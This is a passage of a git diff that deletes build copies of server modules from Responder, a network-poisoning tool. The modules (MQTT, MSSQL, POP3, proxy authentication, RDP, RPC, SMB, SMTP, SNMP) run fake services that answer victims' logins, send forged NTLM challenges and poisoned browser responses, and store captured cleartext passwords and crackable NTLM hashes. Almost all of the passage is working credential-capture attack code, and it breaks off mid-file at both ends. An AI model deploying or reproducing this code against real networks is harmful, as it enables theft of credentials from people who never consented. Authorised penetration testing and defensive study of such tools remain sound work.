self.__protocolVersion > 4: - willProperties, offset = readVariableByteInteger(data, offset) - - #Skip will properties - offset = skipBinaryDataString(data, offset) - offset = skipBinaryDataString(data, offset) - - #Get Username - if (connectFlags & self.USERNAME_FLAG) > 0: - self.username, offset = readString(data, offset) - else: - self.username = "" - - #Get Password - if (connectFlags & self.PASSWORD_FLAG) > 0: - self.password, offset = readString(data, offset) - else: - self.password = "" - - def isValid(self): - return self.__isValid - - def getProtocolVersion(self): - return self.__protocolVersion - - def data(self, client): - - return { - 'module': 'MQTT', - 'type': 'Cleartext', - 'client': client, - 'hostname': self.clientId, - 'user': self.username, - 'cleartext': self.password, - 'fullhash': self.username + ':' + self.password - } - -class MQTT(BaseRequestHandler): - def handle(self): - - CONTROL_PACKET_TYPE_CONNECT = 0x10 - - try: - data = self.request.recv(2048) - - #Read control packet type - controlPacketType, offset = readInt(data, 0, 1) - - #Skip non CONNECT packets - if controlPacketType != CONTROL_PACKET_TYPE_CONNECT: - return - - #Parse connect packet - packet = MqttPacket(data) - - #Skip if it contains invalid data - if not packet.isValid(): - #Return response - return - - #Send response packet - if packet.getProtocolVersion() < 5: - responsePacket = MQTTv3v4ResponsePacket() - else: - responsePacket = MQTTv5ResponsePacket() - - self.request.send(NetworkSendBufferPython2or3(responsePacket)) - - #Save to DB - SaveToDb(packet.data(self.client_address[0])) - - - except Exception: - self.request.close() - pass diff --git a/build/lib/Responder/servers/MSSQL.py b/build/lib/Responder/servers/MSSQL.py deleted file mode 100644 index acad3d5..0000000 --- a/build/lib/Responder/servers/MSSQL.py +++ /dev/null @@ -1,186 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import random -import struct -import codecs -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer - - -class TDS_Login_Packet: - def __init__(self, data): - - ClientNameOff = struct.unpack(' 60: - WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:]) - - SaveToDb({ - 'module': 'MSSQL', - 'type': 'NTLMv2', - 'client': client, - 'user': Domain+'\\'+User, - 'hash': NTHash[:32]+":"+NTHash[32:], - 'fullhash': WriteHash, - }) - - -def ParseSqlClearTxtPwd(Pwd): - Pwd = map(ord,Pwd.replace('\xa5','')) - Pw = b'' - for x in Pwd: - Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex') - return Pw.decode('latin-1') - - -def ParseClearTextSQLPass(data, client): - TDS = TDS_Login_Packet(data) - SaveToDb({ - 'module': 'MSSQL', - 'type': 'Cleartext', - 'client': client, - 'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName), - 'user': TDS.UserName, - 'cleartext': ParseSqlClearTxtPwd(TDS.Password), - 'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password), - }) - -# MSSQL Server class -class MSSQL(BaseRequestHandler): - def handle(self): - - try: - self.ntry = 0 - while True: - data = self.request.recv(1024) - self.request.settimeout(1) - Challenge = RandomChallenge() - - if not data: - break - if settings.Config.Verbose: - print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:",""))) - if data[0] == b"\x12" or data[0] == 18: # Pre-Login Message - Buffer = str(MSSQLPreLoginAnswer()) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - if data[0] == b"\x10" or data[0] == 16: # NegoSSP - if re.search(b'NTLMSSP',data): - Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - Packet.calculate() - Buffer = str(Packet) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - else: - ParseClearTextSQLPass(data,self.client_address[0]) - - if data[0] == b'\x11' or data[0] == 17: # NegoSSP Auth - ParseSQLHash(data,self.client_address[0],Challenge) - - except: - pass - -# MSSQL Server Browser class -# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx -class MSSQLBrowser(BaseRequestHandler): - def handle(self): - if settings.Config.Verbose: - print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0])) - - data, soc = self.request - - if data: - if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX - self.send_response(soc, "MSSQLSERVER") - elif data[0:1] == b'\x04': # CLNT_UCAST_INST - self.send_response(soc, data[1:].rstrip(b"\x00")) - elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC - self.send_dac_response(soc) - - def send_response(self, soc, inst): - print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0])) - - server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20))) - resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst) - soc.sendto(struct.pack(". -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import POPOKPacket,POPNotOKPacket - -# POP3 Server class -class POP3(BaseRequestHandler): - def SendPacketAndRead(self): - Packet = POPOKPacket() - self.request.send(NetworkSendBufferPython2or3(Packet)) - return self.request.recv(1024) - - def handle(self): - try: - data = self.SendPacketAndRead() - if data[0:4] == b'CAPA': - self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket())) - data = self.request.recv(1024) - if data[0:4] == b'AUTH': - self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket())) - data = self.request.recv(1024) - if data[0:4] == b'USER': - User = data[5:].strip(b"\r\n").decode("latin-1") - data = self.SendPacketAndRead() - if data[0:4] == b'PASS': - Pass = data[5:].strip(b"\r\n").decode("latin-1") - - SaveToDb({ - 'module': 'POP3', - 'type': 'Cleartext', - 'client': self.client_address[0], - 'user': User, - 'cleartext': Pass, - 'fullhash': User+":"+Pass, - }) - self.SendPacketAndRead() - except Exception: - pass diff --git a/build/lib/Responder/servers/Proxy_Auth.py b/build/lib/Responder/servers/Proxy_Auth.py deleted file mode 100644 index 56b7fd5..0000000 --- a/build/lib/Responder/servers/Proxy_Auth.py +++ /dev/null @@ -1,144 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler, StreamRequestHandler -else: - from SocketServer import BaseRequestHandler, StreamRequestHandler -from Responder.servers.HTTP import ParseHTTPHash -from Responder.packets import * - -def GrabUserAgent(data): - UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data) - if UserAgent: - print(text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2))) - -def GrabCookie(data): - Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data) - - if Cookie: - Cookie = Cookie.group(0).replace('Cookie: ', '') - if len(Cookie) > 1: - if settings.Config.Verbose: - print(text("[Proxy-Auth] %s" % color("Cookie : "+Cookie, 2))) - - return Cookie - return False - -def GrabHost(data): - Host = re.search(r'(Host:*.\=*)[^\r\n]*', data) - - if Host: - Host = Host.group(0).replace('Host: ', '') - if settings.Config.Verbose: - print(text("[Proxy-Auth] %s" % color("Host : "+Host, 2))) - - return Host - return False - -def PacketSequence(data, client, Challenge): - NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data) - if NTLM_Auth: - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - if Packet_NTLM == b'\x01': - if settings.Config.Verbose: - print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:",""))) - Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - Buffer.calculate() - Buffer_Ans = WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1')) - return Buffer_Ans - - if Packet_NTLM == b'\x03': - NTLM_Auth = b64decode(''.join(NTLM_Auth)) - ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth") - GrabUserAgent(data) - GrabCookie(data) - GrabHost(data) - #Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes... - #Buffer.calculate() - #Return a TCP RST, so the client uses direct connection and avoids disruption. - return RST - else: - return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB... - - elif Basic_Auth: - GrabUserAgent(data) - GrabCookie(data) - GrabHost(data) - ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1')) - SaveToDb({ - 'module': 'Proxy-Auth', - 'type': 'Basic', - 'client': client, - 'user': ClearText_Auth.decode('latin-1').split(':')[0], - 'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], - }) - - return False - else: - if settings.Config.Basic: - Response = WPAD_Basic_407_Ans() - if settings.Config.Verbose: - print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:",""))) - - else: - Response = WPAD_Auth_407_Ans() - - return str(Response) - -class Proxy_Auth(BaseRequestHandler): - - def handle(self): - try: - Challenge = RandomChallenge() - while True: - self.request.settimeout(3) - remaining = 10*1024*1024 #setting max recieve size - data = '' - while True: - buff = '' - buff = NetworkRecvBufferPython2or3(self.request.recv(8092)) - if buff == '': - break - data += buff - remaining -= len(buff) - #check if we recieved the full header - if data.find('\r\n\r\n') != -1: - #we did, now to check if there was anything else in the request besides the header - if data.find('Content-Length') == -1: - #request contains only header - break - else: - #searching for that content-length field in the header - for line in data.split('\r\n'): - if line.find('Content-Length') != -1: - line = line.strip() - remaining = int(line.split(':')[1].strip()) - len(data) - if remaining <= 0: - break - if data == "": - break - - else: - Buffer = PacketSequence(data,self.client_address[0], Challenge) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - - except: - pass - - diff --git a/build/lib/Responder/servers/RDP.py b/build/lib/Responder/servers/RDP.py deleted file mode 100644 index 39cd092..0000000 --- a/build/lib/Responder/servers/RDP.py +++ /dev/null @@ -1,146 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -import struct -import re -import ssl -import codecs -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -from Responder.packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer - -cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) -key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) - -def ParseNTLMHash(data,client, Challenge): #Parse NTLMSSP v1/v2 - SSPIStart = data.find(b'NTLMSSP') - SSPIString = data[SSPIStart:] - LMhashLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] - SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') - DomainLen = struct.unpack('. -from Responder.utils import * -import struct -import re -import ssl -import codecs - -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -from Responder.packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego - -NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2 -Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1 -MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa" - -#for mapper -DSRUAPI = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2" #v4 -LSARPC = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0 -NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1 -WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1 - - - -def Chose3264x(packet): - if Map32 in packet: - return Map32 - else: - return Map64 - -def FindNTLMOpcode(data): - SSPIStart = data.find(b'NTLMSSP') - if SSPIStart == -1: - return False - SSPIString = data[SSPIStart:] - return SSPIString[8:12] - -def ParseRPCHash(data,client, Challenge): #Parse NTLMSSP v1/v2 - SSPIStart = data.find(b'NTLMSSP') - SSPIString = data[SSPIStart:] - LMhashLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] - SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') - DomainLen = struct.unpack('. -import struct, re -import codecs -from Responder.utils import * -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from random import randrange -from Responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data - - -def Is_Anonymous(data): # Detect if SMB auth was Anonymous - SecBlobLen = struct.unpack(' 260: - LMhashLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen] - SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1') - DomainLen = struct.unpack(' 25: - FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex') - LmHash = FullHash[:32].upper() - NtHash = FullHash[32:].upper() - WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1')) - - SaveToDb({ - 'module': 'SMB', - 'type': 'NTLMv2', - 'client': client, - 'user': Domain+'\\'+Username, - 'hash': NtHash, - 'fullhash': WriteHash, - }) - - if NthashLen == 24: - NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper() - LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper() - WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1')) - SaveToDb({ - 'module': 'SMB', - 'type': 'NTLMv1', - 'client': client, - 'user': Domain+'\\'+Username, - 'hash': NtHash, - 'fullhash': WriteHash, - }) - -def IsNT4ClearTxt(data, client): - HeadLen = 36 - - if data[14:16] == "\x03\x80": - SmbData = data[HeadLen+14:] - WordCount = data[HeadLen] - ChainedCmdOffset = data[HeadLen+1] - - if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117: - PassLen = struct.unpack(' 2: - Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") - User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") - print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))) - WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password) - - -class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP - def handle(self): - try: - self.ntry = 0 - while True: - data = self.request.recv(1024) - self.request.settimeout(1) - Challenge = RandomChallenge() - - if not data: - break - - if data[0:1] == b"\x81": #session request 139 - Buffer = "\x82\x00\x00\x00" - try: - self.request.send(Buffer) - data = self.request.recv(1024) - except: - pass - - ##Negotiate proto answer SMBv2. - if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data): - head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00") - t = SMB2NegoAns() - t.calculate() - packet1 = str(head)+str(t) - buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(NetworkSendBufferPython2or3(buffer1)) - data = self.request.recv(1024) - - ## Nego answer SMBv2. - if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe": - head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1')) - t = SMB2NegoAns(Dialect="\x10\x02") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(NetworkSendBufferPython2or3(buffer1)) - data = self.request.recv(1024) - ## Session Setup 2 answer SMBv2. - if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe": - head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0") - t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(NetworkSendBufferPython2or3(buffer1)) - data = self.request.recv(1024) - ## Session Setup 3 answer SMBv2. - if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe': - ParseSMBHash(data, self.client_address[0], Challenge) - head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1')) - t = SMB2Session2Data() - packet1 = str(head)+str(t) - buffer1 = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(NetworkSendBufferPython2or3(buffer1)) - data = self.request.recv(1024) - - # Negotiate Protocol Response smbv1 - if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None: - Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) - Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data))) - Body.calculate() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # Session Setup AndX Request smbv1 - IsNT4ClearTxt(data, self.client_address[0]) - - # STATUS_MORE_PROCESSING_REQUIRED - Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data))) - if settings.Config.CaptureMultipleCredentials and self.ntry == 0: - Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - else: - Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge)) - Body.calculate() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - - if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # STATUS_SUCCESS - if Is_Anonymous(data): - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. - Body = SMBSessEmpty() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - - else: - # Parse NTLMSSP_AUTH packet - ParseSMBHash(data,self.client_address[0], Challenge) - - if settings.Config.CaptureMultipleCredentials and self.ntry == 0: - # Send ACCOUNT_DISABLED to get multiple hashes if there are any - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. - Body = SMBSessEmpty() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - self.ntry += 1 - continue - - # Send STATUS_SUCCESS - Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) - Body = SMBSession2Accept() - Body.calculate() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - - if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff": # Tree Connect AndX Request - ParseShare(data) - Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data))) - Body = SMBTreeData() - Body.calculate() - - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - except: - pass - - -class SMB1LM(BaseRequestHandler): # SMB Server class, old version - def handle(self): - try: - self.request.settimeout(1) - data = self.request.recv(1024) - Challenge = RandomChallenge() - if data[0:1] == b"\x81": #session request 139 - Buffer = "\x82\x00\x00\x00" - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - if data[8:10] == b"\x72\x00": #Negotiate proto answer. - head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) - Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge)) - Body.calculate() - Packet = str(head)+str(Body) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - - if data[8:10] == b"\x73\x00": #Session Setup AndX Request - if Is_LMNT_Anonymous(data): - head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) - Packet = str(head)+str(SMBSessEmpty()) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - else: - ParseLMNTHash(data,self.client_address[0], Challenge) - head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data))) - Packet = str(head) + str(SMBSessEmpty()) - Buffer = StructPython2or3('>i', str(Packet))+str(Packet) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(1024) - except Exception: - self.request.close() - pass diff --git a/build/lib/Responder/servers/SMTP.py b/build/lib/Responder/servers/SMTP.py deleted file mode 100644 index 7cecf2d..0000000 --- a/build/lib/Responder/servers/SMTP.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -from base64 import b64decode -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler -from Responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 - -class ESMTP(BaseRequestHandler): - - def handle(self): - try: - self.request.send(NetworkSendBufferPython2or3(SMTPGreeting())) - data = self.request.recv(1024) - - if data[0:4] == b'EHLO' or data[0:4] == b'ehlo': - self.request.send(NetworkSendBufferPython2or3(SMTPAUTH())) - data = self.request.recv(1024) - - if data[0:4] == b'AUTH': - AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data) - if AuthPlain: - User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00'))) - Username = User[0].decode('latin-1') - Password = User[1].decode('latin-1') - - SaveToDb({ - 'module': 'SMTP', - 'type': 'Cleartext', - 'client': self.client_address[0], - 'user': Username, - 'cleartext': Password, - 'fullhash': Username+":"+Password, - }) - - else: - self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1())) - data = self.request.recv(1024) - - if data: - try: - User = list(filter(None, b64decode(data).split(b'\x00'))) - Username = User[0].decode('latin-1') - Password = User[1].decode('latin-1') - except: - Username = b64decode(data).decode('latin-1') - - self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2())) - data = self.request.recv(1024) - - if data: - try: Password = b64decode(data).decode('latin-1') - except: Password = data - - SaveToDb({ - 'module': 'SMTP', - 'type': 'Cleartext', - 'client': self.client_address[0], - 'user': Username, - 'cleartext': Password, - 'fullhash': Username+":"+Password, - }) - - except Exception: - pass diff --git a/build/lib/Responder/servers/SNMP.py b/build/lib/Responder/servers/SNMP.py deleted file mode 100644 index ff3f8e6..0000000 --- a/build/lib/Responder/servers/SNMP.py +++ /dev/null @@ -1,62 +0,0 @@ -#!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -from Responder.utils import * -from binascii import hexlify -from pyasn1.codec.ber.decoder import decode - -if settings.Config.PY2OR3 == "PY3": - from socketserver import BaseRequestHandler -else: - from SocketServer import BaseRequestHandler - -class SNMP(BaseRequestHandler): - def handle(self): - data = self.request[0] - received_record, rest_of_substrate = decode(data) - - snmp_version = int(received_record['field-0']) - - if snmp_version == 3: - full_snmp_msg = hexlify(data).decode('utf-8') - received_record_inner, _ = decode(received_record['field-2']) - snmp_user = str(received_record_inner['field-3']) - engine_id = hexlify(received_record_inner['field-0']._value).decode('utf-8') - auth_params = hexlify(received_record_inner['field-4']._value).decode('utf-8') - - - SaveToDb({ - "module": "SNMP", - "type": "SNMPv3", - "client" : self.client_address[0], - "user": snmp_user, - "hash": auth_params, - "fullhash": 